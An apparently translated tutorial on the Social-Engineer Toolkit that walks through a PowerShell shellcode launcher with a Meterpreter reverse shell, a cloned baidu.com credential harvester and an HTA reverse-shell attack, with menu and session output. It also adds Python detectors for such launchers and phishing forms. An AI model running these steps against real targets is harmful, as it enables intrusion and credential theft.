Social Engineering Toolkit: SEToolkit

Social engineering (often shortened to "social eng") works by analysing the target's psychological weaknesses and exploiting instinctive human reactions and traits such as curiosity and greed, using impersonation, deception, enticement and similar means to reach an attack goal. It is applied very widely, and many hackers bring it into every aspect of penetration work; it is often called the penetration method that uses no technology yet is more powerful than technology. The saying "taking the city is the lesser art, winning the heart is the greater" fits social engineering perfectly.

This post introduces one such tool, the Social-Engineer Toolkit (SEToolkit). It was designed and developed by David Kennedy (ReL1K) and is maintained by an active community (www.social-engineer.org). The toolkit is open source, written in Python, and its main purpose is to help hackers carry out social engineering activities more effectively.

PowerShell Injection Attack

The toolkit includes a PowerShell injection attack payload for Windows 7 through Windows 10. Because a PowerShell script can easily inject shellcode directly into the target's memory, an attack with this payload does not trigger antivirus alerts.

1. Kali Linux ships with SEToolkit installed; just run the tool and choose 1) Social-Engineering Attacks from the main menu.

root@kali:~#  setoolkit

 Select from the menu:
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

set>  1

2. Then, in the next menu, choose 9) Powershell Attack Vectors.

Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules
  99) Return back to the main menu.

set> 9

3. Next, choose the first option, 1) Powershell Alphanumeric Shellcode Injector.

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database
  99) Return to Main Menu

set:powershell> 1

4. First set the local (attacker) IP address, here 192.168.1.40, then wait for the PowerShell script to be generated. By default it is written under /root/.set/reports/powershell/; copy its contents.

Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes

[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes

5. Through whatever route is available, get this shellcode launcher executed on the victim host.

powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() '[base64 payload omitted]'"
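
From the defender's side, the launcher above has a recognisable shape: a hidden window (`-w 1`), the `-ec` switch assembled at runtime from two variables with `sv`/`gv` so that `-EncodedCommand` never appears literally, a second `powershell` nested inside the first, and a long base64 argument that decodes to a UTF-16LE script. The following Python is an added example, not code from the original post or from the SET project; it scores process-creation command lines for those traits and decodes the base64 argument so an analyst can read it. The sample command lines, the benign script standing in for the real payload, and the score weights are all constructed for this example.

```python
# Added example (not from the original post or the SET project): score a
# process-creation command line for the traits of the SET PowerShell
# launcher: hidden window, '-ec' assembled from variables, nested
# powershell, long base64 UTF-16LE script. SAMPLE_CMDLINES are constructed.
import base64
import binascii
import re

# -w 1, -w hidden, -windowstyle hidden (case-insensitive).
HIDDEN_WINDOW = re.compile(r'(?<!\S)-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b', re.I)
# '-ec' built from two variables, as in:  sv i -;sv pz ec;
ASSEMBLED_EC = re.compile(r'\bsv\s+\w+\s+-\s*;.*?\bsv\s+\w+\s+ec\b', re.I)
# A second 'powershell' inside the first one's command string.
NESTED_PS = re.compile(r'powershell.*\bpowershell\b', re.I)
# Literal switch spelled out: -e, -ec, -enc, -EncodedCommand.
LITERAL_EC = re.compile(r'(?<!\S)-e(?:c|nc|ncodedcommand)?\b', re.I)
# Base64-looking tokens; 20+ chars so ordinary words are skipped.
B64_TOKEN = re.compile(r'[A-Za-z0-9+/]{20,}={0,2}')
LONG_BLOB = 200  # chars; an injector script encodes to far more than this (assumed threshold)

# Constructed samples: a harmless Write-Host script stands in for the real payload.
_FAKE_SCRIPT = base64.b64encode(("Write-Host 'constructed sample'\n" * 40).encode('utf-16le')).decode()
SAMPLE_CMDLINES = [
    'powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());'
    "powershell (gv YD).value.toString() '" + _FAKE_SCRIPT + "'\"",
    'powershell -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell -EncodedCommand ' + base64.b64encode('Get-Date'.encode('utf-16le')).decode(),
]


def decode_encoded_command(token):
    """Decode a base64 token the way -EncodedCommand expects (UTF-16LE text).
    Returns the script text, or None if the token is not base64/UTF-16LE."""
    try:
        text = base64.b64decode(token, validate=True).decode('utf-16le')
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    # A real script is almost entirely printable characters.
    printable = sum(ch.isprintable() or ch in '\r\n\t' for ch in text)
    return text if text and printable / len(text) > 0.9 else None


def scan_cmdline(cmd):
    """Return {'score': int, 'reasons': [str], 'decoded': str|None} for one command line."""
    reasons, score, decoded = [], 0, None
    if HIDDEN_WINDOW.search(cmd):
        reasons.append('hidden-window'); score += 1
    if ASSEMBLED_EC.search(cmd):
        reasons.append('assembled-encodedcommand-flag'); score += 3
    if NESTED_PS.search(cmd):
        reasons.append('nested-powershell'); score += 1
    if LITERAL_EC.search(cmd):
        reasons.append('literal-encodedcommand-flag'); score += 1
    # Try the longest base64-looking token first; stop at the first that decodes.
    for tok in sorted(B64_TOKEN.findall(cmd), key=len, reverse=True):
        text = decode_encoded_command(tok)
        if text is not None:
            decoded = text
            reasons.append('base64-utf16-script'); score += 1
            if len(tok) >= LONG_BLOB:
                reasons.append('long-base64-blob'); score += 2
            break
    return {'score': score, 'reasons': reasons, 'decoded': decoded}


if __name__ == '__main__':
    for cmd in SAMPLE_CMDLINES:
        result = scan_cmdline(cmd)
        preview = (result['decoded'] or '').splitlines()[:1]
        print(result['score'], result['reasons'], preview)
```

The variable-assembled `-ec` carries the most weight because ordinary administration never builds a switch name out of `sv`/`gv` calls, whereas a hidden window or a literal `-EncodedCommand` on its own is common in legitimate scheduled tasks; feeding the decoded text back through `scan_cmdline` catches launchers that nest another encoded stage.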

6. Back in Kali, a session has appeared; list it with sessions -i. The target is online!

msf5 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800

msf5 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x86/windows  DESKTOP @ DESKTOP  192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)

msf5 exploit(multi/handler) >

SEToolkit Site Cloning

1. SEToolkit also supports site cloning. First choose 1) Social-Engineering Attacks.

Select from the menu:
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

set> 1

2. Next, choose 2) Website Attack Vectors.

Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules
  99) Return back to the main menu.

set> 2

3. Choose 3) Credential Harvester Attack Method.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method
  99) Return to Main Menu

set:webattack>3

4. There are three options here: the first uses the built-in templates, the second clones a page, and the third imports a custom page. Choose 2 and enter the URL of the page to clone.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com

[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.
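
The cloned page is served from the harvester host and, as the transcript says, every POST it receives is captured. A defender-side check that catches this shape, added here as an example and not taken from the original post or the SET project: parse a fetched HTML page, find forms that carry a password field, resolve each form's action against the page URL, and flag any whose POST target is outside an allow-list of legitimate login hosts, noting when that target is a bare IP literal. The allow-list, the URLs and the HTML below are constructed for this example.

```python
# Added example (not from the original post or the SET project): flag
# credential forms that post to a host outside an assumed allow-list.
# The allow-list, page URLs and HTML are constructed for this example.
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Record each <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == 'form':
            self._current = {'action': attrs.get('action') or '', 'password': False}
            self.forms.append(self._current)
        elif tag == 'input' and self._current is not None:
            if (attrs.get('type') or '').lower() == 'password':
                self._current['password'] = True

    def handle_endtag(self, tag):
        if tag == 'form':
            self._current = None


def is_ip_literal(host):
    """True when the host part of a URL is a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_credential_form_risks(page_url, html, allowed_hosts):
    """Return [{'target': url, 'reason': str}] for password forms posting outside allowed_hosts."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form['password']:
            continue  # search boxes and the like are not credential forms
        # An empty or relative action posts back to the host that served the page.
        target = urljoin(page_url, form['action'])
        host = urlparse(target).hostname or ''
        if host in allowed_hosts:
            continue
        reason = 'ip-literal-target' if is_ip_literal(host) else 'unknown-target-host'
        findings.append({'target': target, 'reason': reason})
    return findings


# Constructed inputs: an assumed allow-list, a cloned login page served from
# the harvester's IP, and a legitimate page whose form posts to its own host.
ALLOWED_LOGIN_HOSTS = {'www.baidu.com'}
CLONED_URL = 'http://192.168.1.40/'
CLONED_HTML = ('<html><body><form action="" method="post">'
               '<input type="text" name="username"><input type="password" name="password">'
               '<input type="submit"></form></body></html>')
LEGIT_URL = 'https://www.baidu.com/login'
LEGIT_HTML = ('<form action="/login" method="post"><input name="u"><input type="password" name="p"></form>'
              '<form action="/s" method="get"><input name="wd"></form>')

if __name__ == '__main__':
    print(find_credential_form_risks(CLONED_URL, CLONED_HTML, ALLOWED_LOGIN_HOSTS))
    print(find_credential_form_risks(LEGIT_URL, LEGIT_HTML, ALLOWED_LOGIN_HOSTS))
```

Resolving the action with `urljoin` matters: a cloned page usually keeps an empty or relative action, so the POST goes to whichever host served the copy, and only after resolution does the IP literal become visible to the check.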

SEToolkit HTA Injection Attack

The HTA shell injection attack generates a cloned page; when the user clicks to run the script, a reverse shell is triggered back to the listener.

1. Following the steps above, rerun SEToolkit and choose 1) Social-Engineering Attacks.

Select from the menu:
   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
  99) Exit the Social-Engineer Toolkit

set> 1

2. Choose 2) Website Attack Vectors.

Select from the menu:
   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules
  99) Return back to the main menu.

set> 2

3. Choose 8) HTA Attack Method.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method
  99) Return to Main Menu

set:webattack>8

4. Choose 2) Site Cloner to clone a site, then choose an attack payload, here Meterpreter Reverse TCP.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]: 
Enter the port for the reverse payload [443]: 
Select the payload you want to deliver:

  1. Meterpreter Reverse HTTPS
  2. Meterpreter Reverse HTTP
  3. Meterpreter Reverse TCP

Enter the payload number [1-3]: 3

5. Once the user opens the page and runs the script, the shell is returned successfully.
